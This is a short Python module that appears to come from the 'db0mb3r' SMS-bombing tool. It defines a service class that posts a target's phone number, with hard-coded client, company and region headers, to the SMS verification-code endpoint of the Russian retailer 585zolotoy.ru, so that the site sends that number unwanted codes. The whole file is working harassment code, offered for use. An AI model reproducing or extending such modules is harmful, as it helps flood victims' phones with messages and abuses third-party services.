585zolotoy.py 476 B

1234567891011121314151617
  1. from db0mb3r.services.service import Service
  2. class Zolotoy585(Service):
  3. phone_codes = [7]
  4. async def run(self):
  5. await self.post(
  6. "https://www.585zolotoy.ru/api/sms/send_code/",
  7. headers={
  8. "client-type": "WEB",
  9. "company": "3e6efe10-defd-4983-94a1-c5a4d3cb3689",
  10. "region": "75c221cc-0386-4631-b47c-f8951d820a07",
  11. },
  12. json={"phone": self.formatted_phone,},
  13. )